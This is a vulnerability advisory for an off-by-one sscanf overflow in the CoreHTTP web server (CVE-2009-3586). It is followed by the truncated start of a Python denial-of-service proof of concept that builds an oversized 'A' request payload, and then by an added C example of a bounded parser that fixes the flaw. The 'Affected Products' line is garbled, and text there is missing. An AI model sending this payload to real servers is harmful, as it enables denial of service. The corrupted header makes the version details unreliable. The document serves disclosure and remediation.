CoreHTTP web server offbyone buffer overflow vulnerability
Patroklos Argyroudis
12/02/2009

# bugtraq: http://seclists.org/bugtraq/2009/Dec/99
# census ID: census-2009-0003
# URL: http://census-labs.com/news/2009/12/02/corehttp-web-server/
# CVE ID: CVE-2009-3586
# Affected Products: CoreHTTP web server versions buffer,
# 46: "%" PATHSIZE_S "[A-Za-z] %" PATHSIZE_S "s%*[ \t\n]", req, url);
#
# The buffers req and url are declared to be of size 256 bytes (PATHSIZE)
# and the sscanf() call writes 256 bytes (PATHSIZE_S) to these buffers
# without NULL terminating them.
#
# Note that this is not vulnerability CVE-2007-4060, in which the same
# sscanf() call contained no bounds check at all.
#
# This vulnerability can lead to denial of service attacks against the
# CoreHTTP web server and potentially to the remote execution of
# arbitrary code with the privileges of the user running the server. We
# have developed a proof-of-concept exploit to demonstrate the
# vulnerability:
#
# http://census-labs.com/media/corex.txt
#
# For the time being, one may use the following workaround to address this
# issue, until an official fix is released by the author:
#
# http://census-labs.com/media/corehttp-0.5.3.1-patch.txt
#
# --
# Patroklos Argyroudis
# http://www.census-labs.com/

#!/usr/bin/env python
# corex.py -- Patroklos Argyroudis, argp at domain census-labs.com
#
# Denial of service exploit for CoreHTTP web server version <= 0.5.3.1:
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3586
#
# For a detailed analysis see:
#
# http://census-labs.com/news/2009/12/02/corehttp-web-server/

import os
import sys
import socket

def main(argv):
    argc = len(argv)

    if argc != 3:
        print("usage: %s <host> <port>" % (argv[0]))
        sys.exit(0)

    host = argv[1]
    port = int(argv[2])

    print("[*] target: %s:%d" % (host, port))

    payload = "A" * 257 + "/index.html HTTP/1.1\r\n\r\n"

    print()
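The off-by-one the advisory describes, shown from the fixing side as an added C example that is not part of the advisory, of corex.py or of CoreHTTP: a request-line parser that keeps the same 256-byte req/url buffers but passes sscanf() a width of 255 and rejects oversized tokens before writing anything. PATHSIZE and the conversion specifiers come from the advisory; the PARSE_* codes, the helper names and the constructed inputs are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define PATHSIZE 256  /* size of the req/url buffers, per the advisory */
/* "%Ns" / "%N[...]" store up to N characters and then a NUL, so the
 * destination needs N + 1 bytes. CoreHTTP used a width of PATHSIZE for
 * PATHSIZE-byte buffers (the off-by-one); here the width is PATHSIZE - 1. */
#define WIDTH "255"
enum { PARSE_OK = 0, PARSE_MALFORMED = -1, PARSE_TOO_LONG = -2 };

/* Parse "<method> <url> ..." into req and url, refusing any token that
 * would not fit together with its terminator instead of truncating it. */
int parse_request_line(const char *line, char req[PATHSIZE], char url[PATHSIZE])
{
    static const char alpha[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    req[0] = url[0] = '\0';
    size_t mlen = strspn(line, alpha);       /* what %[A-Za-z] would consume */
    if (mlen == 0) return PARSE_MALFORMED;
    if (mlen > PATHSIZE - 1) return PARSE_TOO_LONG;
    const char *p = line + mlen;
    if (!isspace((unsigned char)*p)) return PARSE_MALFORMED;
    while (isspace((unsigned char)*p)) p++;
    size_t ulen = strcspn(p, " \t\r\n\f\v"); /* what %s would consume */
    if (ulen == 0) return PARSE_MALFORMED;
    if (ulen > PATHSIZE - 1) return PARSE_TOO_LONG;
    /* Both tokens are known to fit, so the bounded sscanf cannot truncate. */
    if (sscanf(line, "%" WIDTH "[A-Za-z] %" WIDTH "s", req, url) != 2)
        return PARSE_MALFORMED;
    return PARSE_OK;
}

/* Parse into scratch buffers and return only the result code. */
int classify_request_line(const char *line)
{
    char req[PATHSIZE], url[PATHSIZE];
    return parse_request_line(line, req, url);
}

/* Constructed input: an n-letter method followed by a normal request tail,
 * the same kind of oversized method the advisory's PoC request carries. */
int classify_method_of_length(size_t n)
{
    char line[PATHSIZE * 2 + 32];
    if (n > PATHSIZE * 2) n = PATHSIZE * 2;
    memset(line, 'A', n);
    strcpy(line + n, " /index.html HTTP/1.1\r\n");
    return classify_request_line(line);
}
```

A 256-letter method is exactly the input the advisory's width of 256 would have stored with no room for the terminator; here it comes back as PARSE_TOO_LONG instead of being written.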